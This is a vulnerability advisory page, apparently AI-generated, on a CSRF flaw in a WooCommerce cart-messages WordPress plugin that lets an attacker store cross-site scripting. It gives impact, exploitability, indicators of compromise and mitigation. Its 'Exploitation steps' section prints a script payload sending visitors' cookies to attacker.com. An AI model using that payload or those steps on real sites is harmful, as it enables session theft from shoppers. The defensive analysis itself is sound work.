CVE-2025-60171
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-60171 is a Cross-Site Request Forgery (CSRF) vulnerability in the "Conditional Cart Messages for WooCommerce – YourPlugins.com" WordPress plugin that enables Stored Cross-Site Scripting (XSS). It affects all plugin versions up to and including 1.2.10, with no official patch available as of the disclosure date. The vulnerability was reported by Nguyen Xuan Chien on August 26, 2025, and publicly disclosed on September 26, 2025. It carries a CVSS v3.1 base score of 7.1 (High) (Patchstack, Red Hat CVE).

Technical details

The root cause is classified as CWE-352 (Cross-Site Request Forgery), where the plugin fails to implement adequate CSRF token validation on sensitive administrative actions, allowing those actions to be triggered by a forged request. An attacker can craft a malicious web page or link that, when visited by an authenticated WordPress administrator, submits a forged request to the plugin's endpoints — injecting persistent (stored) XSS payloads into cart message settings. Because the scope is changed (S:C in the CVSS vector), the injected script can affect users beyond the administrator who was tricked, executing in the browsers of site visitors who view the manipulated cart messages. No public proof-of-concept code has been identified at this time (Patchstack).

Impact

Successful exploitation allows an attacker to store malicious JavaScript in WooCommerce cart message settings, which then executes in the browsers of any site visitor who encounters the affected cart messages. This can lead to session hijacking, credential theft, redirection to phishing sites, or further compromise of visitor browsers. Confidentiality, integrity, and availability are all assessed as having low individual impact, but the changed scope means the blast radius extends to end users beyond the initially targeted administrator (Patchstack).

Exploitability

No active in-the-wild exploitation has been reported, and no exploit kits or weaponized code are publicly known. The EPSS score is approximately 0.014% (0.000140), indicating a very low probability of exploitation in the near term. Patchstack classifies this as low priority and notes it is unlikely to be exploited, though it acknowledges that CSRF/stored XSS vulnerabilities of this class are sometimes used in mass-exploit campaigns targeting WordPress sites at scale. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Patchstack).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the "Conditional Cart Messages for WooCommerce – YourPlugins.com" plugin at version 1.2.10 or earlier, using tools like WPScan or Shodan.
  2. Craft malicious request: Create an HTML page or form that automatically submits a POST request to the vulnerable plugin's settings endpoint (e.g., the admin-post or options handler), embedding a stored XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) in a cart message field.
  3. Social engineer the administrator: Deliver the malicious page link to a logged-in WordPress administrator via phishing email, forum post, or other social engineering vector.
  4. Trigger CSRF: When the administrator visits the crafted page, their browser silently submits the forged request, saving the XSS payload into the plugin's cart message settings without any CSRF token check.
  5. Stored XSS execution: The injected script is now stored in the database and executes in the browsers of any WooCommerce site visitor who views the affected cart messages, enabling session theft, credential harvesting, or further attacks (Patchstack).

Indicators of compromise

  • Logs: WordPress access logs showing unexpected POST requests to plugin settings endpoints (e.g., wp-admin/admin-post.php or wp-admin/options.php) from unusual referrers or external origins.
  • Database: Unexpected or obfuscated JavaScript content (e.g., <script> tags, eval(), document.cookie, or encoded payloads) stored in plugin-related database options or cart message fields.
  • Network: Outbound connections from visitor browsers to unknown external domains shortly after loading WooCommerce cart pages, potentially indicating active XSS payload execution.
  • File System: No direct file system artifacts expected, as the attack leverages database-stored content rather than file writes.

Mitigation and workarounds

As of the disclosure date (September 26, 2025), no official patch is available for the plugin. Site administrators should consider deactivating and removing the "Conditional Cart Messages for WooCommerce – YourPlugins.com" plugin until a patched version is released. As a compensating control, a Web Application Firewall (WAF) such as Patchstack's virtual patching solution can block exploitation attempts without requiring a code-level fix. Administrators should also ensure that privileged users avoid clicking unsolicited links while authenticated to the WordPress dashboard (Patchstack).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-77115HIGH7.1
  • brave-popup-builder
NoYesAug 23, 2026
CVE-2026-77116MEDIUM4.3
  • brave-popup-builder
NoYesAug 23, 2026
CVE-2026-14853MEDIUM4.3
  • woocommerce-bookings
NoYesAug 23, 2026
CVE-2026-77003LOW2.7
  • content-mask
NoYesAug 23, 2026
CVE-2026-13598NONEN/A
  • restrictmate
NoYesAug 23, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management